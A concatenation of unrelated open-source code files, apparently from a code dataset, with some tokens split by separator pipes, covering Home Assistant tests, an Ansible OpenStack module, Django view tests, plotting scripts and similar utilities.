cascade_fn="/home/philipp/projects/opencv2/OpenCV-2.3.1/data/haarcascades/haarcascade_frontalface_alt2.xml")
eyesDetector = CascadedDetector(scaleFactor=1.1, minNeighbors=5, minSize=(20, 20),
cascade_fn="/home/philipp/projects/opencv2/OpenCV-2.3.1/data/haarcascades/haarcascade_eye.xml")
# detection
for i, r in enumerate(detector.detect(img)):
x0, y0, x1, y1 = r
cv2.rectangle(imgOut, (x0, y0), (x1, y1), (0, 255, 0), 1)
face = img[y0:y1, x0:x1]
for j, r2 in enumerate(eyesDetector.detect(face)):
ex0, ey0, ex1, ey1 = r2
cv2.rectangle(imgOut, (x0 + ex0, y0 + ey0), (x0 + ex1, y0 + ey1), (0, 255, 0), 1)
# display image or write to file
if outFileName is None:
cv2.imshow('faces', imgOut)
cv2.waitKey(0)
cv2.imwrite(outFileName, imgOut)
|
leppa/home-assistant | tests/components/rfxtrx/test_light.py | Python | apache-2.0 | 12,456 | 0.000723 | """The tests for the Rfxtrx light platform."""
import unittest
import RFXtrx as rfxtrxmod
import pytest
from homeassistant.components import rfxtrx as rfxtrx_core
from homeassistant.setup import setup_component
from tests.common import get_test_home_assistant, mock_component
@pytest.mark.skipif("os.environ.get('RFXTRX') != 'RUN'")
class TestLightRfxtrx(unittest.TestCase):
"""Test the Rfxtrx light platform."""
def setUp(self):
"""Set up things to be run when tests are started."""
self.hass = get_test_home_assistant()
mock_component(self.hass, "rfxtrx")
def tearDown(self):
"""Stop everything that was started."""
rfxtrx_core.RECEIVED_EVT_SUBSCRIBERS = []
rfxtrx_core.RFX_DEVICES = {}
if rfxtrx_core.RFXOBJECT:
rfxtrx_core.RFXOBJECT.close_connection()
self.hass.stop()
def test_valid_config(self):
"""Test configuration."""
assert setup_component(
self.hass,
"light",
{
"light": {
"platform": "rfxtrx",
"automatic_add": True,
"devices": {
"0b1100cd0213c7f210010f51": {
"name": "Test",
rfxtrx_core.ATTR_FIREEVENT: True,
}
},
}
},
)
assert setup_component(
self.hass,
"light",
{
"light": {
"platform": "rfxtrx",
"automatic_add": True,
"devices": {
"213c7f216": {
"name": "Test",
"packetid": "0b1100cd0213c7f210010f51",
"signal_repetitions": 3,
}
},
}
},
)
def test_invalid_config(self):
"""Test configuration."""
assert not setup_component(
self.hass,
"light",
{
"light": {
"platform": "rfxtrx",
"automatic_add": True,
"invalid_key": "afda",
"devices": {
"213c7f216": {
"name": "Test",
"packetid": "0b1100cd0213c7f210010f51",
rfxtrx_core.ATTR_FIREEVENT: True,
}
},
}
},
)
def test_default_config(self):
"""Test with 0 switches."""
assert setup_component(
self.hass, "light", {"light": {"platform": "rfxtrx", "devices": {}}}
)
assert 0 == len(rfxtrx_core.RFX_DEVICES)
def test_old_config(self):
"""Test with 1 light."""
assert setup_component(
self.hass,
"light",
{
"light": {
"platform": "rfxtrx",
"devices": {
"123efab1": {
"name": "Test",
"packetid": "0b1100cd0213c7f210010f51",
}
},
}
},
)
rfxtrx_core.RFXOBJECT = rfxtrxmod.Core(
"", transport_protocol=rfxtrxmod.DummyTransport
)
assert 1 == len(rfxtrx_core.RFX_DEVICES)
entity = rfxtrx_core.RFX_DEVICES["213c7f216"]
assert "Test" == entity.name
assert "off" == entity.state
assert entity.assumed_state
assert entity.signal_repetitions == 1
assert not entity.should_fire_event
assert not entity.should_poll
assert not entity.is_on
entity.turn_on()
assert entity.is_on
assert entity.brightness == 255
entity.turn_off()
assert not entity.is_on
assert entity.brightness == 0
entity.turn_on(brightness=100)
assert entity.is_on
assert entity.brightness == 100
entity.turn_on(brightness=10)
assert entity.is_on
assert entity.brightness == 10
entity.turn_on(brightness=255)
assert entity.is_on
assert entity.brightness == 255
def test_one_light(self):
"""Test with 1 light."""
assert setup_component(
self.hass,
"light",
{
"light": {
"platform": "rfxtrx",
"devices": {"0b1100cd0213c7f210010f51": {"name": "Test"}},
}
},
)
import RFXtrx as rfxtrxmod
rfxtrx_core.RFXOBJECT = rfxtrxmod.Core(
"", transport_protocol=rfxtrxmod.DummyTransport
)
assert 1 == len(rfxtrx_core.RFX_DEVICES)
entity = rfxtrx_core.RFX_DEVICES["213c7f216"]
assert "Test" == entity.name
assert "off" == entity.state
assert entity.assumed_state
assert entity.signal_repetitions == 1
assert not entity.should_fire_event
assert not entity.should_poll
assert not entity.is_on
entity.turn_on()
assert entity.is_on
assert entity.brightness == 255
entity.turn_off()
assert not entity.is_on
assert entity.brightness == 0
entity.turn_on(brightness=100)
assert entity.is_on
assert entity.brightness == 100
entity.turn_on(brightness=10)
assert entity.is_on
assert entity.brightness == 10
entity.turn_on(brightness=255)
assert entity.is_on
| assert entity.brightness == 255
entity.turn_off()
entity_id = rfxtrx_core.RFX_DEVICES["213c7f216"].entity_id
entity_hass = self. | hass.states.get(entity_id)
assert "Test" == entity_hass.name
assert "off" == entity_hass.state
entity.turn_on()
entity_hass = self.hass.states.get(entity_id)
assert "on" == entity_hass.state
entity.turn_off()
entity_hass = self.hass.states.get(entity_id)
assert "off" == entity_hass.state
entity.turn_on(brightness=100)
entity_hass = self.hass.states.get(entity_id)
assert "on" == entity_hass.state
entity.turn_on(brightness=10)
entity_hass = self.hass.states.get(entity_id)
assert "on" == entity_hass.state
entity.turn_on(brightness=255)
entity_hass = self.hass.states.get(entity_id)
assert "on" == entity_hass.state
def test_several_lights(self):
"""Test with 3 lights."""
assert setup_component(
self.hass,
"light",
{
"light": {
"platform": "rfxtrx",
"signal_repetitions": 3,
"devices": {
"0b1100cd0213c7f230010f71": {"name": "Test"},
"0b1100100118cdea02010f70": {"name": "Bath"},
"0b1100101118cdea02010f70": {"name": "Living"},
},
}
},
)
assert 3 == len(rfxtrx_core.RFX_DEVICES)
device_num = 0
for id in rfxtrx_core.RFX_DEVICES:
entity = rfxtrx_core.RFX_DEVICES[id]
assert entity.signal_repetitions == 3
if entity.name == "Living":
device_num = device_num + 1
assert "off" == entity.state
assert "<Entity Living: off>" == entity.__str__()
elif entity.name == "Bath":
device_num = device_num + 1
assert "off" == entity.state
assert "<Entity Bath: off>" == entity.__str__()
elif entity.name == "Test":
device_num = device_num + 1
assert "off" == entity.state
assert "<Entity Test: off>" == entity.__str__()
assert 3 == device_num
def test_discover_light(self):
"""Test with discovery of lights."""
assert setup_component(
self.hass,
|
Tatsh-ansible/ansible | lib/ansible/modules/cloud/openstack/os_server_facts.py | Python | gpl-3.0 | 3,271 | 0.001529 | #!/usr/bin/python
# Copyright (c) 2014 Hewlett-Packard Development Company, L.P.
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
| 'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: os_server_facts
short_description: Retrieve facts about one or more compute instances
author: Monty
version_added: "2.0"
description:
- Retrieve facts about server instances from OpenStack.
notes:
| - This module creates a new top-level C(openstack_servers) fact, which
contains a list of servers.
requirements:
- "python >= 2.6"
- "shade"
options:
server:
description:
- restrict results to servers with names or UUID matching
this glob expression (e.g., C<web*>).
required: false
default: None
detailed:
description:
- when true, return additional detail about servers at the expense
of additional API calls.
required: false
default: false
availability_zone:
description:
- Ignored. Present for backwards compatibility
required: false
extends_documentation_fragment: openstack
'''
EXAMPLES = '''
# Gather facts about all servers named C<web*>:
- os_server_facts:
cloud: rax-dfw
server: web*
- debug:
var: openstack_servers
'''
import fnmatch
try:
import shade
from shade import meta
HAS_SHADE = True
except ImportError:
HAS_SHADE = False
def main():
argument_spec = openstack_full_argument_spec(
server=dict(required=False),
detailed=dict(required=False, type='bool'),
)
module_kwargs = openstack_module_kwargs()
module = AnsibleModule(argument_spec, **module_kwargs)
if not HAS_SHADE:
module.fail_json(msg='shade is required for this module')
try:
cloud = shade.openstack_cloud(**module.params)
openstack_servers = cloud.list_servers(
detailed=module.params['detailed'])
if module.params['server']:
# filter servers by name
pattern = module.params['server']
openstack_servers = [server for server in openstack_servers
if fnmatch.fnmatch(server['name'], pattern) or fnmatch.fnmatch(server['id'], pattern)]
module.exit_json(changed=False, ansible_facts=dict(
openstack_servers=openstack_servers))
except shade.OpenStackCloudException as e:
module.fail_json(msg=str(e))
# this is magic, see lib/ansible/module_common.py
from ansible.module_utils.basic import *
from ansible.module_utils.openstack import *
if __name__ == '__main__':
main()
|
fedora-infra/fedora-packages | fedoracommunity/widgets/package/package.py | Python | agpl-3.0 | 4,090 | 0.001711 | import mako
import uuid
import moksha.common.utils
import logging
import tw2.core as twc
import tg
from fedoracommunity.lib.utils import OrderedDict
from mako.template import Template
from fedoracommunity.connectors.api import get_connector
log = logging.getLogger(__name__)
class TabWidget(twc.Widget):
template="mako:fedoracommunity.widgets.package.templates.tabs"
base_url = twc.Param(default='/')
args = twc.Param(default=None)
kwds = twc.Param(default=None)
tabs = twc.Variable(default=None)
_uuid = twc.Param(default=None)
widget = twc.Variable(default=None)
active_tab = twc.Variable(default=None)
tabs = twc.Variable(default=None)
default_tab = None
def __init__(self, *args, **kw):
super(TabWidget, self).__init__(*args, **kw)
self._uuid = str(uuid.uuid4())
self._expanded_tabs = OrderedDict()
for key, widget_key in self.tabs.items():
display_name = key
key = key.lower().replace(' ', '_')
self._expanded_tabs[key] = {'display_name': display_name,
'widget_key': widget_key}
def prepare(self):
super(TabWidget, self).prepare()
if not self.args:
self.args = []
if not self.kwds:
self.kwds = {}
if isinstance(self.args, mako.runtime.Undefined):
self.args = []
if isinstance(self.kwds, mako.runtime.Undefined):
self.kwds = {}
if len(self.args) > 0:
active_tab = self.args.pop(0).lower()
else:
active_tab = self.default_tab.lower()
try:
self.widget = moksha.common.utils.get_widget(self._expanded_tabs[active_tab]['widget_key'])
except KeyError:
self.widget = None
self.tabs = self._expanded_tabs
self.active_tab = active_tab
if isinstance(self.base_url, Template):
self.base_url = tg.url(self.base_url.render(**self.__dict__))
class PackageNavWidget(TabWidget):
tabs = OrderedDict([('Overview', 'package_overview'),
('Builds', 'package_b | uilds'),
('Updates', 'package_updates'),
('Bugs', 'package_bugs'),
('Problems', 'package_problems'),
('Contents', 'package_cont | ents'),
('Changelog', 'package_changelog'),
('Sources', 'package_sources')])
#('Relationships', 'package_relationships')])
base_url = Template(text='/${kwds["package_name"]}/');
default_tab = 'Overview'
args = twc.Param(default=None)
kwds = twc.Param(default=None)
class PackageWidget(twc.Widget):
template = "mako:fedoracommunity.widgets.package.templates.package_chrome"
package_name = twc.Param()
args = twc.Param(default=None)
kwds = twc.Param(default=None)
summary = twc.Variable(default='No summary provided')
description = twc.Variable(default='No description provided')
navigation_widget = PackageNavWidget
def prepare(self):
name = self.args.pop(0)
self.kwds['package_name'] = name
self.kwds['subpackage_of'] = ""
self.package_name = name
xapian_conn = get_connector('xapian')
result = xapian_conn.get_package_info(name)
self.package_info = result
super(PackageWidget, self).prepare()
if not result:
tg.redirect('/s/' + name)
if result['name'] == name:
self.summary = result['summary']
self.description = result['description']
else:
self.kwds['subpackage_of'] = result['name']
for subpkg in result['sub_pkgs']:
if subpkg['name'] == name:
self.summary = subpkg['summary']
self.description = subpkg['description']
break
else:
tg.redirect('/s/' + name)
def __repr__(self):
return u"<PackageWidget %s>" % self.package_name
|
Achint08/open-event-orga-server | tests/unittests/views/guest/test_search.py | Python | gpl-3.0 | 5,392 | 0.002782 | import unittest
import urllib
from datetime import datetime, timedelta
from flask import url_for
from app import current_app as app
from app.helpers.data import save_to_db
from app.helpers.flask_ext.helpers import slugify
from tests.unittests.object_mother import ObjectMother
from tests.unittests.utils import OpenEventTestCase
def get_event():
event = ObjectMother.get_event()
event.name = 'Super Event'
event.start_time = datetime.now() + timedelta(days=5)
event.end_time = event.start_time + timedelta(days=5)
event.location_name = 'India'
event.searchable_location_name = 'India'
event.state = 'Published'
return event
def get_event_two():
event = get_event()
event.start_time = datetime.now() + timedelta(days=8)
event.end_time = event.start_time + timedelta(days=4)
event.name = 'Random Event'
return event
def assert_events(self, location_name, query_params_one=None, query_params_two=None):
if query_params_two is None:
query_params_two = {}
if query_params_one is None:
query_params_one = {}
rv = self.app.get(url_for('explore.explore_view', location=slugify(location_name)) + '?' +
urllib.urlencode(query_params_one), follow_redirects=True)
self.assertTrue("Super Event" in rv.data, msg=rv.data)
self.assertTrue("Random Event" not in rv.data, msg=rv.data)
rv = self.app.get(url_for('explore.explore_view', location=slugify(location_name)) + '?' +
urllib.urlencode(query_params_two), follow_redirects=True)
self.assertTrue("Super Event" not in rv.data, msg=rv.data)
self.assertTrue("Random Event" in rv.data, msg=rv.data)
class TestSearchEventPage(OpenEventTestCase):
def test_location_filter(self):
with app.test_request_context():
event = get_event()
save_to_db(event, "Event Saved")
event = get_event_two()
event.location_name = 'United States'
event.searchable_location_name = 'United States'
save_to_db(event, "Event Saved")
rv = self.app.get(url_for('explore.explore_view', location=slugify('India')), follow_re | directs=True)
self.assertTrue("Super Event" in rv.data, msg=rv.data)
self.assertTrue("Random Event" not in rv.data, msg=rv.data)
rv = self.app.get(url_for('explore.explore_view', location=slugify('United States')), follow_redirects=True)
self.assertTrue("Super Event" not in rv.data, msg=rv.data)
self.assertTrue("Random Event" in rv.data, msg=rv.data)
def test_topic_filter(self):
with app.t | est_request_context():
event_one = get_event()
save_to_db(event_one, "Event Saved")
event_two = get_event_two()
event_two.topic = 'Home & Lifestyle'
event_two.sub_topic = 'Home & Garden'
save_to_db(event_two, "Event Saved")
query_params_one = {
'category': event_one.topic
}
query_params_two = {
'category': event_two.topic
}
assert_events(self, event_one.location_name, query_params_one, query_params_two)
def test_sub_topic_filter(self):
with app.test_request_context():
event_one = get_event()
save_to_db(event_one, "Event Saved")
event_two = get_event_two()
event_two.topic = 'Home & Lifestyle'
event_two.sub_topic = 'Home & Garden'
save_to_db(event_two, "Event Saved")
query_params_one = {
'category': event_one.topic,
'sub-category': event_one.sub_topic
}
query_params_two = {
'category': event_two.topic,
'sub-category': event_two.sub_topic
}
assert_events(self, event_one.location_name, query_params_one, query_params_two)
def test_type_filter(self):
with app.test_request_context():
event_one = get_event()
save_to_db(event_one, "Event Saved")
event_two = get_event_two()
event_two.type = 'Appearance or Signing'
save_to_db(event_two, "Event Saved")
query_params_one = {
'type': event_one.type,
}
query_params_two = {
'type': event_two.type
}
assert_events(self, event_one.location_name, query_params_one, query_params_two)
def test_custom_date_range_filter(self):
with app.test_request_context():
event_one = get_event()
save_to_db(event_one, "Event Saved")
event_two = get_event_two()
save_to_db(event_two, "Event Saved")
query_params_one = {
'period': (event_one.start_time - timedelta(days=1)).strftime('%m-%d-%Y') + ' to ' +
(event_one.end_time + timedelta(days=1)).strftime('%m-%d-%Y')
}
query_params_two = {
'period': (event_two.start_time - timedelta(days=1)).strftime('%m-%d-%Y') + ' to ' +
(event_two.end_time + timedelta(days=1)).strftime('%m-%d-%Y')
}
assert_events(self, event_one.location_name, query_params_one, query_params_two)
if __name__ == '__main__':
unittest.main()
|
waseem18/oh-mainline | vendor/packages/Django/tests/regressiontests/generic_views/base.py | Python | agpl-3.0 | 14,853 | 0.00101 | from __future__ import absolute_import
import time
from django.core.exceptions import ImproperlyConfigured
from django.http import HttpResponse
from django.test import TestCase, RequestFactory
from django.utils import unittest
from django.views.generic import View, TemplateView, RedirectView
from . import views
class SimpleView(View):
"""
A simple view with a docstring.
"""
def get(self, request):
return HttpResponse('This is a simple view')
class SimplePostView(SimpleView):
post = SimpleView.get
class PostOnlyView(View):
def post(self, request):
return HttpResponse('This view only accepts POST')
class CustomizableView(SimpleView):
parameter = {}
def decorator(view):
view.is_decorated = True
return view
class DecoratedDispatchView(SimpleView):
@decorator
def dispatch(self, request, *args, **kwargs):
return super(DecoratedDispatchView, self).dispatch(request, *args, **kwargs)
class AboutTemplateView(TemplateView):
def get(self, request):
return self.render_to_response({})
def get_template_names(self):
return ['generic_views/about.html']
class AboutTemplateAttributeView(TemplateView):
template_name = 'generic_views/about.html'
def get(self, request):
return self.render_to_response(context={})
class InstanceView(View):
def get(self, request):
return self
class ViewTest(unittest.TestCase):
rf = RequestFactory()
def _assert_simple(self, response):
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b'This is a simple view')
def test_no_init_kwargs(self):
"""
Test that a view can't be accidentally instantiated before deployment
"""
try:
view = SimpleView(key='value').as_view()
self.fail('Should not be able to instantiate a view')
except AttributeError:
pass
def test_no_init_args(self):
"""
Test that a view can't be accidentally instantiated before deployment
"""
try:
view = SimpleView.as_view('value')
self.fail('Should not be able to use non-keyword arguments instantiating a view')
except TypeError:
pass
def test_pathological_http_method(self):
"""
The edge case of a http request that spoofs an existing method name is caught.
"""
self.assertEqual(SimpleView.as_view()(
self.rf.get('/', REQUEST_METHOD='DISPATCH')
).status_code, 405)
def test_get_only(self):
"""
Test a view which only allows GET doesn't allow other methods.
"""
self._assert_simple(SimpleView.as_view()(self.rf.get('/')))
self.assertEqual(SimpleView.as_view()(self.rf.post('/')).status_code, 405)
self.assertEqual(SimpleView.as_view()(
self.rf.get('/', REQUEST_METHOD='FAKE')
).status_code, 405)
def test_get_and_head(self):
"""
Test a view which supplies a GET method also responds correctly to HEAD.
"""
self._assert_simple(SimpleView.as_view()(self.rf.get('/')))
response = SimpleView.as_view()(self.rf.head('/'))
self.assertEqual(response.status_code, 200)
def test_head_no_get(self):
"""
Test a view which supplies no GET method responds to HEAD with HTTP 405.
"""
response = PostOnlyView.as_view()(self.rf.head('/'))
self.assertEqual(response.status_code, 405)
def test_get_and_post(self):
"""
Test a view which only allows both GET and POST.
"""
self._assert_simple(SimplePostView.as_view()(self.rf.get('/')))
self._assert_simple(SimplePostView.as_view()(self.rf.post('/')))
self.assertEqual(SimplePostVi | ew.as_view()(
self.rf.get('/', REQUEST_METHOD='FAKE')
).status_code, 405)
def test_invalid_keyword_argument(self):
"""
Test that view arguments must be predefined on the class and can't
be named like a HTTP method.
"""
# Check each of the allowed method names
for method in SimpleView.http_method_names:
| kwargs = dict(((method, "value"),))
self.assertRaises(TypeError, SimpleView.as_view, **kwargs)
# Check the case view argument is ok if predefined on the class...
CustomizableView.as_view(parameter="value")
# ...but raises errors otherwise.
self.assertRaises(TypeError, CustomizableView.as_view, foobar="value")
def test_calling_more_than_once(self):
"""
Test a view can only be called once.
"""
request = self.rf.get('/')
view = InstanceView.as_view()
self.assertNotEqual(view(request), view(request))
def test_class_attributes(self):
"""
Test that the callable returned from as_view() has proper
docstring, name and module.
"""
self.assertEqual(SimpleView.__doc__, SimpleView.as_view().__doc__)
self.assertEqual(SimpleView.__name__, SimpleView.as_view().__name__)
self.assertEqual(SimpleView.__module__, SimpleView.as_view().__module__)
def test_dispatch_decoration(self):
"""
Test that attributes set by decorators on the dispatch method
are also present on the closure.
"""
self.assertTrue(DecoratedDispatchView.as_view().is_decorated)
def test_options(self):
"""
Test that views respond to HTTP OPTIONS requests with an Allow header
appropriate for the methods implemented by the view class.
"""
request = self.rf.options('/')
view = SimpleView.as_view()
response = view(request)
self.assertEqual(200, response.status_code)
self.assertTrue(response['Allow'])
def test_options_for_get_view(self):
"""
Test that a view implementing GET allows GET and HEAD.
"""
request = self.rf.options('/')
view = SimpleView.as_view()
response = view(request)
self._assert_allows(response, 'GET', 'HEAD')
def test_options_for_get_and_post_view(self):
"""
Test that a view implementing GET and POST allows GET, HEAD, and POST.
"""
request = self.rf.options('/')
view = SimplePostView.as_view()
response = view(request)
self._assert_allows(response, 'GET', 'HEAD', 'POST')
def test_options_for_post_view(self):
"""
Test that a view implementing POST allows POST.
"""
request = self.rf.options('/')
view = PostOnlyView.as_view()
response = view(request)
self._assert_allows(response, 'POST')
def _assert_allows(self, response, *expected_methods):
"Assert allowed HTTP methods reported in the Allow response header"
response_allows = set(response['Allow'].split(', '))
self.assertEqual(set(expected_methods + ('OPTIONS',)), response_allows)
def test_args_kwargs_request_on_self(self):
"""
Test a view only has args, kwargs & request once `as_view`
has been called.
"""
bare_view = InstanceView()
view = InstanceView.as_view()(self.rf.get('/'))
for attribute in ('args', 'kwargs', 'request'):
self.assertNotIn(attribute, dir(bare_view))
self.assertIn(attribute, dir(view))
class TemplateViewTest(TestCase):
urls = 'regressiontests.generic_views.urls'
rf = RequestFactory()
def _assert_about(self, response):
response.render()
self.assertEqual(response.status_code, 200)
self.assertContains(response, '<h1>About</h1>')
def test_get(self):
"""
Test a view that simply renders a template on GET
"""
self._assert_about(AboutTemplateView.as_view()(self.rf.get('/about/')))
def test_head(self):
"""
Test a TemplateView responds correctly to HEAD
"""
response = AboutTemplateView.as_view()(self.rf.head('/about/'))
self.assertEqual(response.status_code, 200)
def |
Bayonet-Client/bayonet-python | bayonet/exceptions.py | Python | mit | 1,465 | 0 | import json
class BayonetError(Exception):
"""All errors related to making an API request extend this."""
def __init__(self, message=None,
request_body=None, request_headers=None,
http_response_code=None, http_response_message=None):
super(BayonetError, self).__init__(message)
self.request_body = request_body
self.request_header | s = request_headers
self.http_response_code = http_response_code
self.http_response_message = http_response_message
# Get reason_code and reason_message from response
tr | y:
response_as_json = json.loads(http_response_message)
if 'reason_code' in response_as_json:
self.reason_code = response_as_json['reason_code']
else:
self.reason_code = None
if 'reason_message' in response_as_json:
self.reason_message = response_as_json['reason_message']
else:
self.reason_message = None
if 'status' in response_as_json:
self.status = response_as_json['status']
else:
self.status = None
except ValueError:
self.reason_code = None
self.reason_message = None
self.status = None
class InvalidClientSetupError(Exception):
def __init__(self, message=None):
super(InvalidClientSetupError, self).__init__(message)
|
flacjacket/sympy | examples/intermediate/differential_equations.py | Python | bsd-3-clause | 579 | 0.001727 | #!/usr/bin/env python
"""Differential equations example
Demonstrates solvin | g 1st and 2nd degree linear ordinary differential
equations.
"""
from sympy import dsolve, Eq, Function, sin, Symbol
def main():
x = Symbol("x")
f = Function("f")
eq = Eq(f(x).diff(x), f(x))
print "Solution for ", eq, " : ", dsolve(eq, f(x))
eq = Eq(f(x).diff(x, 2), -f(x))
print "Solution for ", eq, " : ", dsolve(eq, f(x))
eq = Eq(x**2*f(x).diff(x), -3*x*f(x) + sin(x)/x)
print "Solution for ", eq, " : ", dsolve(eq, f | (x))
if __name__ == "__main__":
main()
|
kumar303/addons-server | src/olympia/users/tests/test_commands.py | Python | bsd-3-clause | 2,353 | 0 | import json
import uuid
from django.core.management import call_command
from unittest.mock import ANY, patch
from six import StringIO
from olympia.amo.tests import TestCase
from olympia.users.management.commands.createsuperuser import (
Command as CreateSuperUser)
from olympia.users.models import UserProfile
@patch('olympia.users.management.commands.createsuperuser.input')
def test_createsuperuser_username_validation(input):
responses = ['', 'myusername']
input.side_effect = lambda *args: responses.pop(0)
command = CreateSuperUser()
assert command.get_value('username') == 'myusername'
@patch('olympia.users.management.commands.createsuperuser.input')
def test_createsuperuser_email_validation(input):
responses = ['', 'myemail', 'me@mozilla.org']
input.side_effect = lambda *args: responses.pop(0)
command = CreateSuperUser()
assert command.get_value('email') == 'me@mozilla.org'
class TestCreateSuperUser(TestCase):
fixtures = ['users/test_backends']
@patch('olympia.users.management.commands.createsuperuser.input')
def test_creates_user(self, input):
responses = {
'Username: ': 'myusername',
'Email: ': | 'me@mozilla.org',
}
input.side_effect = lambda label: responses[label]
count = UserProfile.objects.count()
CreateSuperUser().handle()
assert UserProfile.objects.count() == count + 1
user = UserProfile.objects.get(username='myusername')
assert user.email == 'me@mozilla.org'
def test_adds_supergroup(self):
out = StringIO()
fxa_id = uuid.uuid4().hex
call_co | mmand(
'createsuperuser',
interactive=False,
username='myusername',
email='me@mozilla.org',
add_to_supercreate_group=True,
fxa_id=fxa_id,
stdout=out)
user = UserProfile.objects.get(username='myusername')
assert user.email == 'me@mozilla.org'
assert user.read_dev_agreement
assert user.groups.filter(rules='Accounts:SuperCreate').exists()
response = json.loads(out.getvalue())
assert response == {
'username': 'myusername',
'email': 'me@mozilla.org',
'api-key': ANY,
'api-secret': ANY,
'fxa-id': fxa_id,
}
|
barentsen/iphas-dr2 | paper/figures/caldiagram/plot.py | Python | mit | 2,297 | 0.003483 | """Plots the calibrated and uncalibrated CCD over a large area."""
import os
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
from astropy.io import fits
from astropy import log
from dr2 import constants
fields = constants.IPHASQC[constants.IPHASQC_COND_RELEASE]
mask = (fields['l'] > 160.0) & (fields['l'] < 200.)
ids = fields['id'][mask]
log.info('Plotting {0} fields.'.format(len(ids)))
calibrated = True
if calibrated:
CATALOGUE_PATH = '/home/gb/tmp/iphas-dr2-rc6/bandmerged-calibrated/'
else:
CATALOGUE_PATH = '/home/gb/tmp/iphas-dr2-rc6/bandmerged/'
COLORMAP = matplotlib.colors.LinearSegmentedColormap.from_list('mymap',
['#bd0026', '#f03b20', '#fd8d3c', '#fecc5c', '#ffffb2'])
rmi, rmha = [], []
for field in ids:
filename = os.path.join(CATALOGUE_PATH, field+'.fits')
log.info(filename)
d = fits.getdata(filename, 1)
veryreliable = (d['reliable']
& (d['pStar'] > 0.9)
& -d['deblend']
& -d['brightNeighb']
& (d['r'] < 18)
)
rmi.append(d['rmi'][veryreliable])
rmha.append(d['rmha'][veryreliable])
#plt.scatter(d['rmi'][veryreliable], d['rmha'][veryreliable])
plt.figure()
plt.subplots_adjust(0.16, 0.20, 0.98, 0.98 | )
vmax = 500
hist, xedges, yedges = np.hist | ogram2d(np.concatenate(rmi),
np.concatenate(rmha),
range=[[-0.3, 3.1], [-0.1, 2.1]],
bins=[320, 300])
extent = [xedges[0], xedges[-1], yedges[0], yedges[-1] ]
hist[hist == 0] = np.nan
plt.imshow(hist.T, extent=extent,
interpolation='nearest',
origin='lower',
aspect='auto',
vmin=0,
vmax=vmax,
cmap=COLORMAP)
if calibrated:
label = '(b) After re-calibration'
else:
label = '(a) Before re-calibration'
plt.text(0.06, 0.92, label,
horizontalalignment='left',
verticalalignment='top',
transform=plt.gca().axes.transAxes,
fontsize=11)
plt.xlabel('$r$ - $i$')
plt.ylabel('$r$ - $\\rm H\\alpha$')
plt.xlim([-0.3, 3.])
plt.ylim([-0.1, 1.5])
if calibrated:
output = 'ccd-calibrated.pdf'
else:
output = 'ccd-uncalibrated.pdf'
plt.savefig(output, dpi=300)
plt.close()
|
chfoo/cloaked-octo-nemesis | sandbox.yoyogames.com/bouncer.py | Python | gpl-3.0 | 1,876 | 0.010128 | from http.server import HTTPServer, BaseHTTPRequestHandler
import http.client
import re
import requests
import urllib.parse
import logging
class Handler(BaseHTTPRequestHandler):
def do_GET(self):
path, delim, query_string = self.path.partition('?')
if path != '/':
self.send_error(404)
return
query = urllib.parse.parse_qs(query_string)
if 'id' in query and query['id']:
self.process_game(query['id'][0])
else:
self.send_error(404)
def process_game(self, game_id):
try:
game_id = int(game_id)
except ValueError:
self.send_error(500)
return
url = 'h | ttp://sandbox.yoyogames.com/games/{}/download'
response = requests.get(url.format(game_id),
head | ers={'Accept-Encoding': 'gzip'})
logging.info('Fetch %s', url.format(game_id))
if response.status_code != 200:
logging.info('Failed fetch %s %s', response.status_code, response.reason)
self.send_error(500,
explain='Got {} {}'.format(response.status_code, response.reason))
match = re.search(r'<a href="(/games/[\w_-]+/send_download\?code=[\w]+)">', response.text)
download_link = 'http://sandbox.yoyogames.com{}'.format(match.group(1))
logging.info('Got URL %s', download_link)
self.send_response(http.client.TEMPORARY_REDIRECT)
self.send_header('Location', download_link)
self.send_header('Content-Length', '0')
self.end_headers()
def run():
logging.basicConfig(level=logging.INFO)
server_address = ('', 8000)
httpd = HTTPServer(server_address, Handler)
httpd.serve_forever()
if __name__ == '__main__':
run() |
nanaze/pystitch | pystitch/examples/closest_colors.py | Python | apache-2.0 | 562 | 0.021352 | """
Find | the closest DMC colors for a hex color.
Usage: python closest_colors.py <hexcolor>
"""
import sys
from .. import color
from .. import dmc_colors
def main():
if len(sys.argv) < 2:
sys.exit(__doc__)
hex_color = sys.argv[1]
rgb_color = color.RGBColorFromHexString(hex_color)
print 'Given RGB color', rgb_color
print
print 'Closest DMC colors by distance:'
for pair in dmc_colors.GetClosestDMCColorsPairs(rgb_color):
| print 'Distance:', pair[1], dmc_colors.GetStringForDMCColor(pair[0])
if __name__ == '__main__':
main()
|
plotly/plotly.py | packages/python/plotly/plotly/validators/barpolar/marker/line/_colorsrc.py | Python | mit | 423 | 0.002364 | import _plotly_utils.basevalidators
class ColorsrcValidator | (_plotly_utils.basevalidators.SrcValidator):
def __init__(
self, plotly_name="colorsrc", parent_name="barpolar.marker.line", **kwargs
):
super(ColorsrcValidator, self).__init__(
plotl | y_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
**kwargs
)
|
devs1991/test_edx_docmode | venv/lib/python2.7/site-packages/numpy/oldnumeric/precision.py | Python | agpl-3.0 | 4,239 | 0.004246 | # Lifted from Precision.py. This is for compatibility only.
#
# The character strings are still for "new" NumPy
# which is the only Incompatibility with Numeric
__all__ = ['Character', 'Complex', 'Float',
'PrecisionError', 'PyObject', 'Int', 'UInt',
'UnsignedInt', 'UnsignedInteger', 'string', 'typecodes', 'zeros']
from functions import zeros
import string # for backwards compatibility
typecodes = {'Character':'c', 'Integer':'bhil', 'UnsignedInteger':'BHIL', 'Float':'fd', 'Complex':'FD'}
def _get_precisions(typecodes):
lst = []
for t in typecodes:
lst.append( (zeros( (1,), t ).itemsize*8, t) )
return lst
def _fill_table(typecodes, table={}):
for key, value in typecodes.items():
table[key] = _get_precisions(value)
return table
_code_table = _fill_table(typecodes)
class PrecisionError(Exception):
pass
